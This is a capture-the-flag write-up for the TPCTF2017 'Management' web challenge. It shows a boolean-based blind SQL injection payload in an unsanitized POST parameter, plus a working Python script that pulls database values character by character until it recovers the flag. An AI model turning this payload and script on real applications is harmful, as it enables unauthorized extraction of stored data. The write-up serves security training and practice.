[Web] TPCTF2017 - Management


Management
60

I’ve created a new website so you can do all your important management. It includes users, creating things, reading things, and… well, not much else. Maybe there’s a flag?

Second instance running at 52.90.229.46:8558

tpctf{san1t1z3_y0ur_1npu7s} is not the correct flag. Look harder ;)
Note: the flag format is flag{}, not the usual tpctf{}

Author: Kevin Higgs

Opening the website we can see we can choose the user:

After doing this its shown a new form where we could read/insert into the columns data from the table users from the current user:

We can see which sql query is being executed:

1
SELECT `1` FROM users WHERE name = 'custom-kevin';Result: 1

It’s shown in the website! all inputs are being sanitized for the exception of the POST parameter number! I used Blind Sql injection to do this challenge (Boolean Based) the base payload I used was

1
1`=if((SELECT hex(substring('Abc',1,1)))=hex(substring('A',1,1)),`1`, 'False'), `1

It’s important to use HEX function because substring is case insensitive and would return wrong queries if we didn’t use it, notice that what is going to be shown in the page is the result of the comparison we are making in the sql query so if the comparison is true our query will show in the page Result: 1 if it’s false it will return Result: 0, doing this by hand is tedious so I wrote a python script to automate the stuff:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import string

url='http://52.90.229.46:8558'
TABLE_NAME = 'SELECT hex(substring(table_name,1,%d)) FROM information_schema.tables WHERE table_schema=database() limit %d,1'
SUBSTRING_HEX_NAME = "hex(substring('{}',1,{}))"
USERS_NAME = 'SELECT hex(substring(name,1,%d)) FROM users limit %d,1'

name = ''
cookie = {'user': 'kevin'}
for j in range(1,5):
name = ''
for i in range(1,60+1):
stop = True
for l in string.printable:
PAYLOAD = "1`=if((%s)=%s,`1`, 'False'),`9" % (USERS_NAME%(i,j), SUBSTRING_HEX_NAME.format(name+l,i))#SUBSTRING_NAME.format(name+l, i))
#print PAYLOAD
r = requests.post(url, data={'number':'%s'%PAYLOAD,'action':'Read', 'value':''}, cookies=cookie, timeout=6)

if 'Result: 1' in r.text:
#print '-----------------------------------'
name += l
print name
stop = False
break
if stop:
break
#if(1=1,sleep(6),0)

Running it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ python management.py 
f
fl
fla
flag
flag{
flag{a
flag{aL
flag{aLW
flag{aLW4
flag{aLW4y
flag{aLW4ys
flag{aLW4ys_
flag{aLW4ys_E
flag{aLW4ys_ES
flag{aLW4ys_ESC
flag{aLW4ys_ESC4
flag{aLW4ys_ESC4P
flag{aLW4ys_ESC4PE
flag{aLW4ys_ESC4PE_
flag{aLW4ys_ESC4PE_3
flag{aLW4ys_ESC4PE_3v
flag{aLW4ys_ESC4PE_3v3
flag{aLW4ys_ESC4PE_3v3r
flag{aLW4ys_ESC4PE_3v3rY
flag{aLW4ys_ESC4PE_3v3rYT
flag{aLW4ys_ESC4PE_3v3rYTH
flag{aLW4ys_ESC4PE_3v3rYTH1
flag{aLW4ys_ESC4PE_3v3rYTH1N
flag{aLW4ys_ESC4PE_3v3rYTH1NG
flag{aLW4ys_ESC4PE_3v3rYTH1NG!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!}